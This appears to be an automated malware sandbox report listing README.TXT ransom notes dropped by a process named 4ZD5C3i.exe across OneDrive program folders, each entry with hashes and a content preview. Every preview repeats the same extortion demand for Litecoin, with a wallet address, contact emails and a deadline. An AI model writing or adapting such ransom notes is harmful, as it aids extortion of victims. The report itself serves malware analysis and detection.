                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\pt-PT\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\qml\QtQuick\Controls\Private\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\qml\QtQuick\Controls\Styles\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\qml\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\quc\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\quz-PE\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\ro\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\ru\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\rw\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\sk\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\sl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\sourcemaps\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\sq\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\sr-Cyrl-BA\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\sr-Cyrl-RS\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\sr-Latn-RS\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
